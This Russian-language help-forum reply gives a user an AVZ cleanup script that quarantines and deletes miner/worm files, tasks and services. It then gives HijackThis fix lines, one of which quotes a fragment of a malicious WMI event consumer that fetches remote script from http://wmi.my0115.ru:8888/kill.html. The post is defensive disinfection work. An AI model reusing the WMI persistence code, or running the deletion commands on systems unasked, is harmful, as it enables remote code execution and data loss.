Выполните скрипт в AVZ:
Код:
begin
TerminateProcessByName('c:\program files (x86)\common files\conime.exe');
StopService('Windows Audio Control');
QuarantineFile('c:\program files (x86)\common files\conime.exe', '');
QuarantineFile('c:\windows\debug\item.dat', '');
QuarantineFile('c:\windows\debug\ok.dat', '');
QuarantineFile('C:\Windows\help\lsmosee.exe', '');
QuarantineFile('C:\WINDOWS\mssecsvc.exe', '');
QuarantineFile('C:\Windows\syswow64\lsmos.exe', '');
DeleteFile('a.exe>', '32');
DeleteFile('c:\program files (x86)\common files\conime.exe', '32');
DeleteFile('c:\windows\debug\item.dat>', '32');
DeleteFile('c:\windows\debug\item.dat', '32');
DeleteFile('c:\windows\debug\ok.dat', '32');
DeleteFile('C:\Windows\help\lsmosee.exe', '32');
DeleteFile('C:\WINDOWS\mssecsvc.exe', '32');
DeleteFile('C:\Windows\syswow64\lsmos.exe', '32');
ExecuteFile('schtasks.exe', '/delete /TN "Mysa" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "Mysa1" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "Mysa2" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "Mysa3" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "ok" /F', 0, 15000, true);
DeleteService('mssecsvc2.0');
DeleteService('Windows Audio Control');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start');
CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
ExecuteRepair(22);
ExecuteWizard('SCU', 2, 2, true);
RebootWindows(true);
end.
Компьютер перезагрузится.
В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.
Запустите HijackThis, расположенный в папке Autologger и пофиксите (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):
Код:
O7 - IPSec: Name: win (2018/02/09) - {480c106c-87e8-49f7-bdb0-b7536c7cc423} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/02/09) - {480c106c-87e8-49f7-bdb0-b7536c7cc423} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/02/09) - {480c106c-87e8-49f7-bdb0-b7536c7cc423} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/02/09) - {480c106c-87e8-49f7-bdb0-b7536c7cc423} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2018/02/09) - {480c106c-87e8-49f7-bdb0-b7536c7cc423} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O25 - WMI Event: [fuckyoumm2_consumer] fuckyoumm2_filter - var toff=3000;var url1 = "http://wmi.my0115.ru:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for(1724 bytes)
Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).